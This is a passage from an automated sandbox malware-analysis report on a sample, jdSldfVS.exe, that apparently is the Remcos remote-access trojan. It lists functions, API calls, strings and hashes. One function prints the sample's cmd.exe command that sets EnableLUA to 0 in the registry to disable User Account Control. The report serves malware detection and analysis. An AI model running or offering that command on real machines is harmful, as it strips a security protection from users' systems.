                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                        Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                        • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: XQG
                        • API String ID: 1958988193-3606453820
                        • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                        • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                        Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                        • GetLastError.KERNEL32 ref: 0041D580
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                        Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                        • CloseHandle.KERNEL32(?), ref: 004077AA
                        • CloseHandle.KERNEL32(?), ref: 004077AF
                        Strings
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                        Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: SG$C:\Users\user\AppData\Roaming\jdSldfVS.exe
                        • API String ID: 0-966513011
                        • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                        • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                        • SetEvent.KERNEL32(?), ref: 0040512C
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                        • CloseHandle.KERNEL32(?), ref: 00405140
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: KeepAlive | Disabled
                        • API String ID: 2993684571-305739064
                        • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                        • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                        Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                        Strings
                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                        • API String ID: 3024135584-2418719853
                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                        Function 0040140A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll$`#v
                        • API String ID: 1646373207-1032071883
                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                        Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                        • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                        Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • _free.LIBCMT ref: 00444E06
                        • _free.LIBCMT ref: 00444E1D
                        • _free.LIBCMT ref: 00444E3C
                        • _free.LIBCMT ref: 00444E57
                        • _free.LIBCMT ref: 00444E6E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID:
                        • API String ID: 3033488037-0
                        • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                        • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                        Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                        • _free.LIBCMT ref: 004493BD
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00449589
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                        Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 4269425633-0
                        • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                        • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                        Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                        Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                        • _free.LIBCMT ref: 0044F3BF
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                        • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                        Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerWrite
                        • String ID:
                        • API String ID: 1852769593-0
                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                        Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 004509D4
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 004509E6
                        • _free.LIBCMT ref: 004509F8
                        • _free.LIBCMT ref: 00450A0A
                        • _free.LIBCMT ref: 00450A1C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                        Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00444066
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00444078
                        • _free.LIBCMT ref: 0044408B
                        • _free.LIBCMT ref: 0044409C
                        • _free.LIBCMT ref: 004440AD
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                        Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                        • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                        • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                        • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                        Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                        Download Yara Rule
                        APIs
                        • _strpbrk.LIBCMT ref: 0044E738
                        • _free.LIBCMT ref: 0044E855
                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                        Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountEventTick
                        • String ID: !D@$NG
                        • API String ID: 180926312-2721294649
                        • Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                        • Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                        Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                        • String ID: XQG$NG$PG
                        • API String ID: 1634807452-3565412412
                        • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                        • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                        Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: `#D$`#D
                        • API String ID: 885266447-2450397995
                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                        Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000104), ref: 00443475
                        • _free.LIBCMT ref: 00443540
